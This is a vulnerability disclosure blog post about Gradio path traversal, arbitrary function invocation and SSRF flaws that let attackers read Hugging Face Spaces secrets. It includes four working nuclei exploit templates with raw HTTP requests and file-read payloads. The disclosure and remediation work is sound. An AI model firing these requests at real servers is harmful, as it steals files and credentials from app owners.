On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.
This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.
Hugging Face responded promptly to our reports and patched Gradio. To our surprise, however, although the vulnerabilities had long been patched in Gradio itself, they were, until recently, still exploitable on the Spaces platform for apps running an outdated Gradio version.
This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.
Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.
Users have several options for sharing Gradio apps: hosting them in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet through a Gradio-provided proxy URL, similar to ngrok.
A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps: the Spaces platform also supports apps developed using Streamlit, Docker, or static HTML.
Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.
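As a minimal sketch of what this looks like from the app's side, the snippet below reads a secret from the process environment. The helper name `load_secret` and the variable name `MY_API_TOKEN` are hypothetical and chosen only for illustration.

```python
import os


def load_secret(name: str) -> str:
    """Return a secret that the hosting platform injected as an environment variable."""
    value = os.environ.get(name)
    if not value:
        # Fail loudly rather than silently running without credentials.
        raise RuntimeError(f"secret {name!r} is not configured")
    return value


# Hypothetical usage inside an app:
#   token = load_secret("MY_API_TOKEN")
```

Because the value lives in the process environment, anything that can read that environment sees it too, not only the app's own code.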
Last December we disclosed to Hugging Face two high-severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it is self-hosted, shared using the share feature, or hosted in a Hugging Face Space. In a Hugging Face Space, attackers could exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.
CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to serve only files stored within a Gradio temporary directory. However, we found that the check ensuring a requested file was contained within the temporary directory was flawed.
The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.
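To illustrate this class of flaw, here is a hypothetical sketch. It is not Gradio's source code, and the function names and the /tmp/gradio path are assumptions. The first check only rejects paths whose relative form starts with "..", so a traversal that first descends into a subdirectory slips through. The second collapses ".." segments before comparing.

```python
import posixpath
from pathlib import PurePosixPath


def flawed_is_inside(requested: str, base: str) -> bool:
    """Hypothetical flawed check: only looks for a *leading* '..' segment."""
    try:
        relative = PurePosixPath(requested).relative_to(base)
    except ValueError:
        return False  # requested path does not start with base at all
    return not str(relative).startswith("..")


def safer_is_inside(requested: str, base: str) -> bool:
    """Collapse '..' segments first, then require base to be a path prefix."""
    normalized = posixpath.normpath(requested)
    base_normalized = posixpath.normpath(base)
    return posixpath.commonpath([normalized, base_normalized]) == base_normalized


temp_dir = "/tmp/gradio"
via_subdir = "/tmp/gradio/abc/../../../etc/passwd"

print(flawed_is_inside(via_subdir, temp_dir))  # the traversal is accepted
print(safer_is_inside(via_subdir, temp_dir))   # the traversal is rejected
```

This sketch works on path strings only. A production check would also need to account for symlinks, for example by resolving real paths before comparing.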
To read environment variables, one can request the /proc/self/environ pseudo-file using an HTTP Range header.
Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.
Below is a nuclei template for testing this vulnerability:
id: CVE-2023-51449

info:
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2023-51449
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        -----------------------------250033711231076532771336998311
        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream

        a
        -----------------------------250033711231076532771336998311--

      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\\[\"(.+)okmijnuhbygv\"\\]"

    payloads:
      path:
        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200
CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t yet made the transition to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:
On line 702, an arbitrary user-specified function is invoked against the specified component object.
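The general shape of this flaw can be sketched as follows. This is a hypothetical illustration, not Gradio's code: `DemoComponent`, `exposed`, `unsafe_dispatch`, and `safe_dispatch` are made-up names. The unsafe version calls whatever attribute the client names. The safer version only calls methods that were explicitly marked as remotely callable.

```python
from typing import Any, Callable, List


def exposed(fn: Callable) -> Callable:
    """Mark a method as intentionally callable by remote clients (hypothetical marker)."""
    fn._exposed = True
    return fn


class DemoComponent:
    """Stand-in for a UI component; not a real Gradio class."""

    @exposed
    def list_choices(self, prefix: str) -> List[str]:
        return [c for c in ("alpha", "beta") if c.startswith(prefix)]

    def copy_to_cache(self, path: str) -> str:
        # Internal helper that should never be reachable from a request.
        return "/tmp/cache/" + path.lstrip("/")


def unsafe_dispatch(component: Any, fn_name: str, data: Any) -> Any:
    # Flaw: any attribute named by the client is looked up and called.
    return getattr(component, fn_name)(data)


def safe_dispatch(component: Any, fn_name: str, data: Any) -> Any:
    fn = getattr(component, fn_name, None)
    # Only call methods that carry the explicit marker.
    if not callable(fn) or not getattr(fn, "_exposed", False):
        raise PermissionError(f"{fn_name!r} is not an exposed function")
    return fn(data)
```

With `unsafe_dispatch`, a request naming `copy_to_cache` reaches the internal helper. With `safe_dispatch`, the same request raises `PermissionError`, while `list_choices` still works.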
For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.
In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.
In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.
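To make "internal endpoints" concrete, the sketch below classifies a URL by whether its host is a literal loopback, private, or link-local address, which are the kinds of targets an SSRF typically reaches. The function name is hypothetical, and the check is deliberately incomplete: it does not resolve DNS names, which a real guard would have to do.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_address(url: str) -> bool:
    """Return True if the URL's host is a literal internal address or 'localhost'."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # unparseable host: treat as unsafe
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name; a real guard would resolve it and re-check every address.
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local
```

For example, `targets_internal_address("http://169.254.169.254/")` and `targets_internal_address("http://10.0.0.5:8080/admin")` both return True, because those addresses are normally reachable only from inside the hosting network.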
There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.
The following nuclei templates can be used to test for CVE-2024-1561.
File read against Gradio 4.3-4.12:
id: CVE-2024-1561-4x

info:
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    payloads:
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200
File read against Gradio 3.47 – 3.50.2:
id: CVE-2024-1561-3x

info:
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    attack: clusterbomb
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200
Exploiting the SSRF against Gradio 3.47-3.50.2:
id: CVE-2024-1561-3x-ssrf

info:
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - <html><head></head><body>[a-z0-9]+</body></html>
If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:
As demonstrated above, both CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems, which contains environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user-configured secret and variable are the mysecret and myvariable entries.
PATH=REDACTED^@HOSTNAME=REDACTED^@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^@REDACTED
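The `^@` markers in this output are caret notation for the NUL byte, which separates entries in /proc/self/environ. As a small sketch of how such a dump breaks down into individual variables, the hypothetical helper below splits on NUL bytes. The sample bytes are a shortened copy of the output above.

```python
from typing import Dict


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Split a NUL-separated KEY=VALUE dump into a dictionary."""
    env: Dict[str, str] = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # skip the empty piece after a trailing NUL
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


sample = (
    b"SYSTEM=spaces\x00SPACE_ID=nvn1729/hello-world\x00"
    b"mysecret=mysecretvalue\x00myvariable=variablevalue\x00"
)
parsed = parse_environ(sample)
print(parsed["mysecret"])
```

Secrets and ordinary variables end up side by side in the same dictionary, because nothing in the environment itself distinguishes one from the other.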
When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.
And the vulnerabilities we had reported were still exploitable. We then checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.
It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.
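As a rough aid for checking a Space, the sketch below pulls the version out of a README.md and compares it against the affected ranges stated in this post. It assumes the version appears on an `sdk_version:` line in the README's front matter. The helper names and the sample README text are hypothetical.

```python
import re
from typing import List, Optional, Tuple

# Affected ranges as stated in this post, as inclusive (major, minor) bounds.
AFFECTED = {
    "CVE-2023-51449": ((4, 0), (4, 10)),
    "CVE-2024-1561": ((3, 47), (4, 12)),
}


def sdk_version_from_readme(readme_text: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from an 'sdk_version:' line, if one is present."""
    match = re.search(
        r"^sdk_version:\s*[\"']?(\d+)\.(\d+)", readme_text, re.MULTILINE
    )
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2))


def matching_cves(version: Tuple[int, int]) -> List[str]:
    """List the CVEs from AFFECTED whose range contains the given version."""
    return sorted(
        cve for cve, (low, high) in AFFECTED.items() if low <= version <= high
    )


readme = "---\ntitle: Hello World\nsdk: gradio\nsdk_version: 3.50.2\n---\n"
version = sdk_version_from_readme(readme)
if version is not None:
    print(version, matching_cves(version))
```

An empty result does not mean a version is safe. The table covers only the two CVEs detailed here, and it does not encode the observation that the first exploit also worked against versions prior to 3.33.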
We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:
Hugging Face configured new rules in their “web application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.
Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.
Along with the email notifications, Hugging Face updated their Spaces user interface to highlight when a Space is running an old Gradio version.
We appreciate Hugging Face’s prompt response in improving their security posture.
In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and that even if secrets are rotated, an attacker can still obtain the new values. Therefore, in addition to rotating secrets, we recommend users double-check whether they are running an outdated Gradio version and upgrade to the latest version if required.
To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up until recently.
To upgrade a Gradio Space, a user can visit the README.md file in their Space and click “Upgrade”, as shown below:
Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.
While Hugging Face did harden their WAF to neutralize exploitation, we caution users against assuming that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.
Finally, for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.
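To illustrate why signature-based filtering tends to be brittle, here is a hypothetical sketch of three path filters. These are not Hugging Face's WAF rules. Each one catches the encoding that slipped past the previous one.

```python
from urllib.parse import unquote


def naive_filter_blocks(raw_path: str) -> bool:
    """Block only the literal '../' sequence."""
    return "../" in raw_path


def decode_once_filter_blocks(raw_path: str) -> bool:
    """Percent-decode one time before looking for '../'."""
    return "../" in unquote(raw_path)


def decode_fully_filter_blocks(raw_path: str, max_rounds: int = 5) -> bool:
    """Percent-decode until the path stops changing, then look for '../'."""
    current = raw_path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return "../" in current


plain = "/file=/tmp/x/../../etc/passwd"
encoded = "/file=/tmp/x/%2e%2e%2f%2e%2e%2fetc/passwd"
double_encoded = "/file=/tmp/x/%252e%252e%252fetc/passwd"

for path in (plain, encoded, double_encoded):
    print(
        naive_filter_blocks(path),
        decode_once_filter_blocks(path),
        decode_fully_filter_blocks(path),
    )
```

Whether a given encoding reaches the application in an exploitable form depends on how the proxy and the backend each decode the path. That dependency is why upgrading the vulnerable code is more reliable than filtering requests in front of it.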
The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.
*** This is a Security Bloggers Network syndicated blog from Horizon3.ai authored by Naveen Sunkavally. Read the original post at: https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/